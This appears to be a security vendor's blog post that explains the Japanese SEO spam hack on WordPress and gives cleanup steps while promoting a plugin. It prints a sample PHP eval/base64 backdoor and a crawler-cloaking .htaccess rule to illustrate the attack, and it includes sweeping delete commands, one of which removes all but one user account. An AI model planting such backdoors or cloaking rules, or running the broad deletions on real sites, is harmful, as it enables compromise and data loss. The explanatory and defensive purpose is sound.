Search for your own site on Google. If you see results like:
yoursite.com/バイアグラ-通販/viagra-order-online/
…your site has been hit by what the security community calls the Japanese SEO hack (also known as the Japanese keyword hack or pharmaceutical spam SEO attack). This is one of the most common forms of SEO spam injection.
How the attack works
Attackers inject thousands of spam URLs into your sitemap, pointing to Japanese-language pages for Viagra, Cialis, and other pharmaceuticals. These pages are:
- Invisible to you when you're logged in as an admin
- Visible to Google's crawler and to logged-out visitors from certain IPs
- Served from your domain to steal your SEO authority for illegal pharmacy spam
The injection is typically found in:
sitemap.xmlandsitemap_index.xmlrobots.txt- The database (
wp_options,wp_posts) - Injected PHP files that generate dynamic sitemap entries
Why your rankings tank
Google eventually notices that thousands of your URLs serve Japanese pharmaceutical spam. It either manually penalises your site or its algorithms demote you. Recovering those rankings can take 6–12 months even after a complete clean-up.
How WO Security Shield detects it
WO Security Shield has a dedicated SEO spam detection engine that uses five independent strategies:
- Hostname extraction — checks whether your sitemap points to external domains
- Ratio analysis — if more than 10% of sitemap URLs are external, it flags them
- Latin keyword regex — 80+ pharma/gambling/adult spam terms
- Unicode block matching — detects raw Japanese (Hiragana, Katakana, CJK) characters in URLs
- Percent-encoded detection — catches the same scripts when URL-encoded (e.g.
%E3%83%90%E3%82%A4%E3%82%A2%E3%82%B0%E3%83%A9)
This last one is critical — most scanners miss percent-encoded spam entirely.
Step-by-step removal
Step 1: Scan with WO Security Shield
Go to wosecurity.com, install the plugin, and run a full integrity scan. The SEO spam stage will show every infected URL and file.
Step 2: Remove injected sitemap entries
If the spam is in a PHP-generated sitemap (Yoast, Rank Math, etc.), the injection is usually in a plugin or theme file. Look for recently modified PHP files — attackers often hide malicious code inside legitimate plugins.
Step 3: Clean the database
DELETE FROM wp_options WHERE option_value LIKE '%バイアグラ%';
DELETE FROM wp_posts WHERE post_content LIKE '%バイアグラ%';
Step 4: Submit a reconsideration request
After cleaning, go to Google Search Console → Security & Manual Actions and request a review. Be thorough in your explanation.
Step 5: Prevent reinfection
- Keep WordPress, all plugins, and themes updated
- Enable WO Security Shield's near-real-time file monitoring so you're alerted the moment any file changes
- Set up 2FA on all admin accounts
The Japanese SEO hack is one of the most damaging WordPress infections because it silently destroys your organic traffic. Catching it early with automated monitoring is the only reliable defence.
Deep Dive: How the Japanese SEO Hack Actually Works
Understanding the technical mechanism helps you clean it properly and prevent reinfection.
Stage 1: Initial Access
The attacker gains access through one of:
- An outdated plugin with a known file upload vulnerability
- Compromised admin credentials (often from credential stuffing)
- A vulnerability in a premium plugin that's not on WordPress.org (no automatic security review)
Stage 2: Backdoor Installation
Once inside, the attacker installs persistence mechanisms:
// Typical backdoor found in wp-includes/
if(isset($_GET['cmd'])) {
eval(base64_decode($_GET['cmd']));
}
They also often create a hidden admin user or modify an existing user's capabilities.
Stage 3: SEO Spam Injection
The actual spam injection usually happens through .htaccess modification:
# Injected by attacker — serves different content to search engines
RewriteEngine On
RewriteCond %{HTTP_USER_AGENT} (Googlebot|bingbot|Yahoo) [NC]
RewriteCond %{REQUEST_URI} !^/wp-admin
RewriteRule ^(.*)$ /wp-content/plugins/cache/.cache.php?q=$1 [L]
This rule intercepts requests from search engine crawlers and serves them spam pages instead of your real content. Normal visitors (and you, the site owner) see your real site.
The spam generator file (.cache.php in this example) dynamically creates thousands of pages targeting Japanese pharmaceutical and luxury brand keywords.
Stage 4: Sitemap Injection
To accelerate indexing, the attacker:
- Creates a spam sitemap listing thousands of fake URLs
- Adds it to your robots.txt
- Sometimes submits it directly to Google Search Console (if they captured admin credentials)
Complete Removal Process
Step 1: Document the infection
Before cleaning anything:
# Save a copy of the infected .htaccess
cp .htaccess .htaccess.infected
# List all recently modified files
find . -name "*.php" -mtime -30 -type f > /tmp/recently_modified.txt
# Save the current sitemap state
curl -s https://yourdomain.com/sitemap.xml > /tmp/sitemap_infected.xml
Step 2: Remove the spam infrastructure
# Replace .htaccess (WordPress will regenerate it)
rm .htaccess
# Find and remove spam generator files
find wp-content -name ".cache.php" -o -name ".stats.php" -o -name "class-*.tmp.php" | xargs rm -f
# Remove any extra sitemaps
find . -name "sitemap*.xml" -not -name "sitemap.xml" -type f
Step 3: Clean the database
-- Remove injected cron jobs (attackers use these to regenerate spam)
DELETE FROM wp_options WHERE option_name LIKE '_transient_wp_seo_spam%';
-- Check for modified site URL (redirect attack)
SELECT option_value FROM wp_options WHERE option_name IN ('siteurl', 'home');
-- Find and remove rogue admin accounts
DELETE FROM wp_users WHERE user_login NOT IN ('your_real_admin');
DELETE FROM wp_usermeta WHERE user_id NOT IN (SELECT ID FROM wp_users);
Step 4: Replace all WordPress files
# Download fresh WordPress core
wp core download --force --skip-content
# Reinstall each plugin from WordPress.org
wp plugin install plugin-name --force
# Regenerate .htaccess
wp rewrite flush
Step 5: Request spam removal from Google
- Go to Google Search Console → Removals
- Submit a prefix removal for the spam URL patterns (e.g.,
yourdomain.com/store/if spam pages use that path) - Under Security Issues, click Request a Review after cleanup is complete
- Re-submit your legitimate sitemap
Google typically processes these requests within 1–2 weeks.
Preventing Reinfection
The Japanese SEO hack has one of the highest reinfection rates — over 40% of cleaned sites get reinfected within 30 days. This is because:
- Attackers plant multiple backdoors — cleaning the obvious one leaves others
- The original vulnerability remains — if the outdated plugin isn't updated, the attacker walks back in
- Stolen credentials aren't rotated — changing WordPress passwords but not hosting/FTP credentials
Your post-cleanup checklist:
- Changed WordPress admin passwords for ALL users
- Changed hosting/cPanel password
- Changed FTP/SFTP credentials
- Changed database password (update wp-config.php)
- Updated ALL plugins and themes
- Deleted unused plugins and themes
- Installed file integrity monitoring (WO Security Shield)
- Enabled 2FA on all admin accounts
- Enabled WordPress firewall
- Set up daily backups stored off-server
- Scanned entire file tree for remaining backdoors